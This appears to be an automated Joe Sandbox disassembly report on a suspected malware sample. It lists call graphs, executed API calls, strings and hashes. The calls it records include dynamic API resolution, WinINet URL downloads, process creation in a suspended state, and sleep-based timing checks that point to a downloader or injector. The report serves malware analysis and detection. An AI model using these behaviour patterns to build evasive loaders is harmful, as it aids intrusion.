314c2c 19112 311762 _Fputc 39 API calls 19111->19112 19112->19114 19113->19111 19113->19114 19118 314c62 _Yarn _Fputc 19113->19118 19119 31a7a3 19114->19119 19116 31a67e __fread_nolock 39 API calls 19116->19118 19117 31c6d2 ___scrt_uninitialize_crt 64 API calls 19117->19118 19118->19114 19118->19116 19118->19117 19130 31400d 19118->19130 19120 31a7ae 19119->19120 19121 314b15 19119->19121 19120->19121 19122 31400d ___scrt_uninitialize_crt 64 API calls 19120->19122 19121->19100 19122->19121 19124 3197bc 19123->19124 19129 31978c __Getctype 19123->19129 19126 315b3e __dosmaperr 14 API calls 19124->19126 19125 3197a7 RtlAllocateHeap 19127 3197ba 19125->19127 19125->19129 19126->19127 19127->19109 19128 3163fa codecvt EnterCriticalSection LeaveCriticalSection 19128->19129 19129->19124 19129->19125 19129->19128 19131 314026 19130->19131 19132 31404d 19130->19132 19131->19132 19133 31a67e __fread_nolock 39 API calls 19131->19133 19132->19118 19134 314042 19133->19134 19135 31c6d2 ___scrt_uninitialize_crt 64 API calls 
19134->19135 19135->19132 19136->19102 19138 302321 19137->19138 19138->19138 19139 301500 41 API calls 19138->19139 19140 302335 19139->19140 19154 3018f0 19140->19154 19142 302371 error_info_injector 19142->19049 19143 30234b 19143->19142 19144 3117ef 39 API calls 19143->19144 19145 30239d 19144->19145 19145->19049 19146 30e360 Concurrency::cancel_current_task RaiseException 19145->19146 19147 3023d2 19145->19147 19146->19147 19148 3022c0 41 API calls 19147->19148 19149 302408 19148->19149 19150 30e360 Concurrency::cancel_current_task RaiseException 19149->19150 19151 302417 19150->19151 19152 30e0fd ___std_exception_copy 40 API calls 19151->19152 19153 302444 19152->19153 19153->19049 19171 306d20 19154->19171 19156 301931 19157 301957 19156->19157 19187 308c20 19156->19187 19159 3019c0 _Yarn 19157->19159 19160 308c20 41 API calls 19157->19160 19161 301a1f error_info_injector 19159->19161 19163 301adf 19159->19163 19160->19159 19162 30e0fd ___std_exception_copy 40 API calls 19161->19162 19166 301a7d 19162->19166 19165 3117ef 39 API calls 19163->19165 19164 301aac error_info_injector 19164->19143 19165->19166 19166->19164 19167 3117ef 39 API calls 19166->19167 19168 301ae9 19167->19168 19202 30e160 19168->19202 19170 301b05 error_info_injector 19170->19143 19172 306d48 19171->19172 19173 306df6 19172->19173 19178 306d59 19172->19178 19206 301230 19173->19206 19175 306d84 19179 30cd92 codecvt 41 API calls 19175->19179 19176 306dfb 19177 301190 Concurrency::cancel_current_task 41 API calls 19176->19177 19180 306d97 19177->19180 19178->19175 19181 306dc3 19178->19181 19182 306dcc 19178->19182 19183 306d5e _Yarn 19178->19183 19179->19180 19180->19183 19184 3117ef 39 API calls 19180->19184 19181->19175 19181->19176 19185 30cd92 codecvt 41 API calls 19182->19185 19183->19156 19186 306e05 error_info_injector 19184->19186 19185->19183 19186->19156 19188 308d62 19187->19188 19192 308c44 19187->19192 19189 301230 41 API calls 19188->19189 19190 308d67 19189->19190 19191 
301190 Concurrency::cancel_current_task 41 API calls 19190->19191 19200 308c6a _Yarn 19191->19200 19194 308cb8 19192->19194 19195 308cab 19192->19195 19197 308c5a 19192->19197 19192->19200 19193 30cd92 codecvt 41 API calls 19193->19200 19198 30cd92 codecvt 41 API calls 19194->19198 19195->19190 19195->19197 19196 3117ef 39 API calls 19199 308d71 19196->19199 19197->19193 19198->19200 19200->19196 19201 308d20 _Yarn error_info_injector 19200->19201 19201->19157 19203 30e174 19202->19203 19204 30e16d 19202->19204 19203->19170 19205 313921 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 19204->19205 19205->19203 19209 30adec 19206->19209 19214 30acf2 19209->19214 19212 30e360 Concurrency::cancel_current_task RaiseException 19213 30ae0b 19212->19213 19215 3017b0 std::invalid_argument::invalid_argument 40 API calls 19214->19215 19216 30ad04 19215->19216 19216->19212 19218 3079b2 19217->19218 19219 3079cd 19218->19219 19220 3082f0 41 API calls 19218->19220 19219->19057 19219->19060 19220->19219 19246 30b56a 19221->19246 19224 30b56a std::_Lockit::_Lockit 7 API calls 19225 3086bb 19224->19225 19228 30b5c2 std::_Lockit::~_Lockit 2 API calls 19225->19228 19227 308768 19238 309ad0 19227->19238 19229 3086db 19228->19229 19236 308728 19229->19236 19259 301fa0 19229->19259 19231 308738 19232 308740 19231->19232 19233 30877b 19231->19233 19291 30c432 19232->19291 19297 301c90 19233->19297 19252 30b5c2 19236->19252 19239 309b0d 19238->19239 19240 309b26 19239->19240 19241 3082f0 41 API calls 19239->19241 19242 3023a0 41 API calls 19240->19242 19241->19240 19244 309c26 19242->19244 19243 308aaf 19243->18814 19244->19243 19245 308410 41 API calls 19244->19245 19245->19243 19247 30b579 19246->19247 19250 30b580 19246->19250 19303 313ad6 19247->19303 19249 308698 19249->19224 19249->19229 19250->19249 19308 30cade EnterCriticalSection 19250->19308 19253 313ae4 19252->19253 19254 30b5cc 19252->19254 19361 313abf LeaveCriticalSection 19253->19361 19256 30b5df 19254->19256 19360 
__fread_nolock 18480->18483 18482 31df14 GetLastError 18481->18482 18481->18483 18482->18483 18483->18430 18485 3115c6 _Fputc 39 API calls 18484->18485 18486 313730 18485->18486 18491 3197f9 18486->18491 18492 319810 18491->18492 18493 31374d 18491->18493 18492->18493 18499 321766 18492->18499 18495 319857 18493->18495 18496 31986e 18495->18496 18498 31375a 18495->18498 18496->18498 18521 32005a 18496->18521 18498->18435 18500 321772 ___scrt_is_nonwritable_in_current_image 18499->18500 18501 3193b0 __Getctype 39 API calls 18500->18501 18502 32177b 18501->18502 18503 3217c1 18502->18503 18512 313a77 EnterCriticalSection 18502->18512 18503->18493 18505 321799 18513 3217e7 18505->18513 18510 315b51 CallUnexpected 39 API calls 18511 3217e6 18510->18511 18512->18505 18514 3217f5 __Getctype 18513->18514 18516 3217aa 18513->18516 18515 32151a __Getctype 14 API calls 18514->18515 18514->18516 18515->18516 18517 3217c6 18516->18517 18520 313abf LeaveCriticalSection 18517->18520 18519 3217bd 18519->18503 18519->18510 18520->18519 18522 3193b0 __Getctype 39 API calls 18521->18522 18523 32005f 18522->18523 18526 31ff72 18523->18526 18527 31ff7e ___scrt_is_nonwritable_in_current_image 18526->18527 18528 31ff98 18527->18528 18537 313a77 EnterCriticalSection 18527->18537 18530 31ff9f 18528->18530 18532 315b51 CallUnexpected 39 API calls 18528->18532 18530->18498 18533 320011 18532->18533 18534 31ffa8 18535 319744 ___free_lconv_mon 14 API calls 18534->18535 18536 31ffd4 18534->18536 18535->18536 18538 31fff1 18536->18538 18537->18534 18541 313abf LeaveCriticalSection 18538->18541 18540 31fff8 18540->18528 18541->18540 18544 31f3b6 std::_Locinfo::_Locinfo_dtor 18542->18544 18543 31f3f4 WideCharToMultiByte 18543->18451 18544->18543 18545->18427 18549 31ddb5 ___scrt_is_nonwritable_in_current_image 18546->18549 18547 31ddbd 18547->18396 18548 31ddf8 18550 311762 _Fputc 39 API calls 18548->18550 18549->18547 18549->18548 18551 31de3e 18549->18551 18550->18547 18557 3206c7 
EnterCriticalSection 18551->18557 18553 31de44 18554 31de65 18553->18554 18555 31dece __fread_nolock 41 API calls 18553->18555 18558 31dec6 18554->18558 18555->18554 18557->18553 18561 3206ea LeaveCriticalSection 18558->18561 18560 31decc 18560->18547 18561->18560 21103 3174d3 21106 31719f 21103->21106 21107 3171ab ___scrt_is_nonwritable_in_current_image 21106->21107 21114 313a77 EnterCriticalSection 21107->21114 21109 3171e3 21115 317201 21109->21115 21110 3171b5 21110->21109 21112 3217e7 __Getctype 14 API calls 21110->21112 21112->21110 21114->21110 21118 313abf LeaveCriticalSection 21115->21118 21117 3171ef 21118->21117 23048 30bbde 23049 30bc01 23048->23049 23050 30bbfa 23048->23050 23049->23050 23053 30bc47 23049->23053 23055 30bca7 23049->23055 23051 30d293 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 23050->23051 23052 30bce6 23051->23052 23053->23050 23057 30b601 23053->23057 23055->23050 23056 314db3 67 API calls 23055->23056 23056->23050 23060 314448 23057->23060 23061 31445b _Fputc 23060->23061 23066 3142e7 23061->23066 23063 31446a 23064 31151b _Fputc 39 API calls 23063->23064 23065 30b611 23064->23065 23065->23050 23067 3142f3 ___scrt_is_nonwritable_in_current_image 23066->23067 23068 314320 23067->23068 23069 3142fc 23067->23069 23080 313c57 EnterCriticalSection 23068->23080 23071 311762 _Fputc 39 API calls 23069->23071 23079 314315 _Fputc 23071->23079 23072 314329 23073 31433e 23072->23073 23074 31a67e __fread_nolock 39 API calls 23072->23074 23075 3143db _Fputc 23073->23075 23076 3143aa 23073->23076 23074->23073 23081 314413 23075->23081 23077 311762 _Fputc 39 API calls 23076->23077 23077->23079 23079->23063 23080->23072 23084 313c6b LeaveCriticalSection 23081->23084 23083 314419 23083->23079 23084->23083 23160 313bc5 23161 3140db ___scrt_uninitialize_crt 68 API calls 23160->23161 23162 313bcd 23161->23162 23170 31bb17 23162->23170 23164 313bd2 23165 31bbc2 14 API calls 23164->23165 23166 313be1 DeleteCriticalSection 23165->23166 
23166->23164 23167 313bfc 23166->23167 23168 319744 ___free_lconv_mon 14 API calls 23167->23168 23169 313c07 23168->23169 23171 31bb23 ___scrt_is_nonwritable_in_current_image 23170->23171 23180 313a77 EnterCriticalSection 23171->23180 23173 31bb9a 23181 31bbb9 23173->23181 23174 31bb2e 23174->23173 23176 31bb6e DeleteCriticalSection 23174->23176 23178 313da4 69 API calls 23174->23178 23179 319744 ___free_lconv_mon 14 API calls 23176->23179 23178->23174 23179->23174 23180->23174 23184 313abf LeaveCriticalSection 23181->23184 23183 31bba6 23183->23164 23184->23183

                            Executed Functions

                            APIs
                              • Part of subcall function 003138B9: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?,003059B9,00000000,00000000), ref: 003138CE
                              • Part of subcall function 003138B9: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003138ED
                            • GetTickCount.KERNEL32 ref: 00305D91
                            • Sleep.KERNELBASE(?,?,?,?,?,?), ref: 00305DB6
                            • LoadLibraryA.KERNEL32(user32.dll,?,?,?,?,?,?), ref: 00305DC1
                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 00305DD7
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?), ref: 00305DEA
                            • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?), ref: 0030601F
                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?), ref: 0030602F
                            • GetTickCount.KERNEL32 ref: 00306237
                            • Sleep.KERNEL32(?,?,?,?,?,?,?), ref: 0030625C
                            • MessageBoxW.USER32(00000000,00000000,00000000,00000040), ref: 00306282
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00306294
                            Strings
                            • 4<3, xrefs: 0030591C
                            • user32.dll, xrefs: 00305DBC
                            • 0<3, xrefs: 00305A8A
                            • 4<3, xrefs: 00305681
                            • 0<3, xrefs: 00305D70
                            • _, xrefs: 00305AEF
                            • d, xrefs: 00305B0E
                            • 0<3, xrefs: 003055E2
                            • 4<3, xrefs: 0030560C
                            • =3, xrefs: 00305C5F, 00305C66
                            • , xrefs: 003058FC
                            • 4<3, xrefs: 0030565A
                            • GetSystemMetrics, xrefs: 00305DD1
                            • 4<3, xrefs: 003056A8
                            • 4<3, xrefs: 00305633
                            • = , xrefs: 003055F1, 00305618, 0030563F, 00305666, 0030568D
                            • func_zamtK_0..., xrefs: 00304DAE
                            • 4<3, xrefs: 00305934
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Library$CountFreeSleepTickTime$AddressCallbackConcurrency::cancel_current_taskDispatcherFileLoadMessageProcSystemUnothrow_t@std@@@User__ehfuncinfo$??2@
                            • String ID: $ = $0<3$0<3$0<3$4<3$4<3$4<3$4<3$4<3$4<3$4<3$GetSystemMetrics$_$d$func_zamtK_0...$user32.dll$=3
                            • API String ID: 1832009041-38214448
                            • Opcode ID: 44042d820e355f50ee69d30a5884aec90e49ae22498156d7bae104d0855e9378
                            • Instruction ID: 4a9d0565ecced699c071566ce6063fd8a955b8538a26b7a91f7d7bc7150833ed
                            • Opcode Fuzzy Hash: 44042d820e355f50ee69d30a5884aec90e49ae22498156d7bae104d0855e9378
                            • Instruction Fuzzy Hash: 9D326A319163418BD717DB34C46679FB7E5BFC5300F008B2DF485AB292EB34A9858B82

                            APIs
                            • LoadLibraryA.KERNELBASE(?,00000000,?), ref: 003043FB
                            • GetProcAddress.KERNEL32(?,?), ref: 0030450F
                            • GetProcAddress.KERNEL32(?,?), ref: 00304629
                            • GetProcAddress.KERNEL32(?,?), ref: 00304752
                            • GetProcAddress.KERNEL32(?,?), ref: 00304871
                            • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00304AF6
                            • InternetOpenUrlA.WININET(00000000,?,?,?,04000000,00000000), ref: 00304B47
                            • FreeLibrary.KERNEL32(?), ref: 00304B5C
                            • InternetReadFile.WININET(00000000,00000400,00000400,?), ref: 00304BAD
                            • InternetReadFile.WININET(00000000,?,00000400,?,?,00000000,?,?), ref: 00304C1F
                            • FreeLibrary.KERNEL32(?), ref: 00304C3E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AddressInternetProc$Library$FileFreeOpenRead$Load
                            • String ID:
                            • API String ID: 3799963043-0
                            • Opcode ID: 216a3746f4d916e849578517d169cda9ad9e838de7ab398a810b5e963ef0b1ed
                            • Instruction ID: 28eef71e3f99f9fa6fefeb23bf6ba2e5939bd456e03caf95b9685a0508a04c93
                            • Opcode Fuzzy Hash: 216a3746f4d916e849578517d169cda9ad9e838de7ab398a810b5e963ef0b1ed
                            • Instruction Fuzzy Hash: 9542BC71C14B898AD722CB74C8813EAF7F8EF69344F04871EE999B2152EB7176C58B40
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 00302933
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00302A8B
                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00302B09
                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00303C6F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AddressProc$CreateHandleModuleProcess
                            • String ID:
                            • API String ID: 1919063930-0
                            • Opcode ID: 9e99de7832f1567aad711bdebcda9a48571c668e4ea4c8efd7f2ccf178d330c3
                            • Instruction ID: ed9589d73fcee55b40d836b40e491303026e85c66559d60106d3e5b4f9a23a53
                            • Opcode Fuzzy Hash: 9e99de7832f1567aad711bdebcda9a48571c668e4ea4c8efd7f2ccf178d330c3
                            • Instruction Fuzzy Hash: 79F29A31D05B898EE722CB38C8457EAB7F8BF59344F00875EE499A6252EB7176C5CB04

                            APIs
                            • FreeLibrary.KERNEL32(00000000,?,0031ACBC,?,?,00000000,?,?,?,0031AE6A,00000022,FlsSetValue,0032FFBC,0032FFC4,?), ref: 0031AC6E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 3664257935-537541572
                            • Opcode ID: 9b90367c7f45cf6785a79f5af866e6b664e62f96387bb8b42a91cf1aa65872c6
                            • Instruction ID: d584145a709c63ac04a35c0a415253acd91aa2c42a41ede898c7b0c67e3901a7
                            • Opcode Fuzzy Hash: 9b90367c7f45cf6785a79f5af866e6b664e62f96387bb8b42a91cf1aa65872c6
                            • Instruction Fuzzy Hash: 90213D71A02910EBCB3B9B60DD40ADA776CDF4A761F160124FD06E7290D730ED41C6D1

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,00311A40,00000016,003115E2,?,?,84FDAC87,003115E2,?), ref: 00311A57
                            • TerminateProcess.KERNEL32(00000000,?,00311A40,00000016,003115E2,?,?,84FDAC87,003115E2,?), ref: 00311A5E
                            • ExitProcess.KERNEL32 ref: 00311A70
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: 32c4e760d5ec68f1bd613004bff8a4eacda8b797df841d78c120d1fd5827af55
                            • Instruction ID: 1188e8814b01526d4a6d7c93003f6ae4075e235b525bb3cada45f5278a246ce1
                            • Opcode Fuzzy Hash: 32c4e760d5ec68f1bd613004bff8a4eacda8b797df841d78c120d1fd5827af55
                            • Instruction Fuzzy Hash: 19D09E31011208EBCF176FA0DD0D9DD3F2EBF44385B059014BA0549031CB31D992DA80

                            APIs
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00320F1C,?,00000000,?,?,003211BD,?,00000007,?,?,003216B1,?,?), ref: 0031975A
                            • GetLastError.KERNEL32(?,?,00320F1C,?,00000000,?,?,003211BD,?,00000007,?,?,003216B1,?,?), ref: 00319765
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 485612231-0
                            • Opcode ID: c8637be7b6cd51ef36478ac57090a52218adc59685c4a98ab432f13c3548680f
                            • Instruction ID: 79c3584680453fe543dd23ca0133dff8e9e95f9f6c470243a0b5c7576d540a92
                            • Opcode Fuzzy Hash: c8637be7b6cd51ef36478ac57090a52218adc59685c4a98ab432f13c3548680f
                            • Instruction Fuzzy Hash: 8EE08632640604EBCB2B2FB0AC4CBD93B5C9F4C792F094015F6089A161CA7098D28784

                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 0030A166
                              • Part of subcall function 00301190: ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task___std_exception_copy
                            • String ID:
                            • API String ID: 1979911387-0
                            • Opcode ID: f0889e19c497c0373af77e7d54634ad9379414580978a839744a86a6ac8da8d4
                            • Instruction ID: babd3220c3ab1089edb1cdce0c6ad6849ab5f1cfd263bb90fc129cabc8011315
                            • Opcode Fuzzy Hash: f0889e19c497c0373af77e7d54634ad9379414580978a839744a86a6ac8da8d4
                            • Instruction Fuzzy Hash: 2B51F275B126048FCB1EDF68ECA1B6E77A9AB48310F144229E915DB3D1DB34E904CB81

                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00308D67
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task
                            • String ID:
                            • API String ID: 118556049-0
                            • Opcode ID: 5551ff29b8990e5b3eca07f980bc36e9c3a6f1d6a6046582034cd12cb8b53426
                            • Instruction ID: 979e57eed105b951bbe5e1814de4726a6d6f3ccb77c9d1b7956b67407e49cb66
                            • Opcode Fuzzy Hash: 5551ff29b8990e5b3eca07f980bc36e9c3a6f1d6a6046582034cd12cb8b53426
                            • Instruction Fuzzy Hash: 3E41F372A021089FDB16EF68DC9069EBBB5EF58300F150669F845DB381DA30DD6187A1

                            APIs
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00306DFB
                              • Part of subcall function 00301190: ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_task___std_exception_copy
                            • String ID:
                            • API String ID: 1979911387-0
                            • Opcode ID: 7840ff986a5c211dd7a836ff085a24b04053c828d164257361be389f283a0d64
                            • Instruction ID: b40353e8aa9cc37c383d853e79cef37de5c287109960c5a864fbae55018a2517
                            • Opcode Fuzzy Hash: 7840ff986a5c211dd7a836ff085a24b04053c828d164257361be389f283a0d64
                            • Instruction Fuzzy Hash: 56312472B023019BD7169F24D862B6AB7A8EF54310F15023AF8158B6D1EB71EDA0C7A1

                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5d20e6feb764a0c4f00bdd1b4088db9c13bb97066033df57e062e729dea4fdf5
                            • Instruction ID: ce6f70409b2d534b72e5f9d7b71333dd2a6b958e4ee652d76b5b84cfc93137d8
                            • Opcode Fuzzy Hash: 5d20e6feb764a0c4f00bdd1b4088db9c13bb97066033df57e062e729dea4fdf5
                            • Instruction Fuzzy Hash: 0E01F9336119259FCB1F8B6CED80A9A33ADB7C9361B654024F900DB169DA31D8C09BD1

                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 003011CE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: ___std_exception_copy
                            • String ID:
                            • API String ID: 2659868963-0
                            • Opcode ID: e233d7f0f346ff3eae9795d4458be297b3267382dbdc810ae8b9a51aa8df8ac4
                            • Instruction ID: 36d5d93ec019bd47afd6948bef74fab55127bdbb37479840ff3260cfcb368c66
                            • Opcode Fuzzy Hash: e233d7f0f346ff3eae9795d4458be297b3267382dbdc810ae8b9a51aa8df8ac4
                            • Instruction Fuzzy Hash: 0201DB3551030DA7CB1AABE8EC125D97B9CAE05350B108636FA14DA5D1EB70E594C691

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,0031954E,00000001,00000364,?,00000005,000000FF,?,?,0030E127,?), ref: 00319728
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 39eb039682b22512450f10e2e127f31aad890f6e20d570de61f3e73a04b41dbf
                            • Instruction ID: da35335e3b7792e036d3c0aa974197e30f1bd57608c7f7961202ef7aba86c518
                            • Opcode Fuzzy Hash: 39eb039682b22512450f10e2e127f31aad890f6e20d570de61f3e73a04b41dbf
                            • Instruction Fuzzy Hash: 93F0B436621520E7DB2F5F659C55BDA374CEF5D760F1A4023ED18DB1D0CE30D98182A0

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,0030E127,?,?,?,?,?,00301103,?,?), ref: 003197B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1421497800.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                            • Associated: 00000000.00000002.1421478437.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421524477.000000000032C000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421545894.000000000033F000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1421561944.0000000000341000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_300000_SecuriteInfo.jbxd
                            Similarity
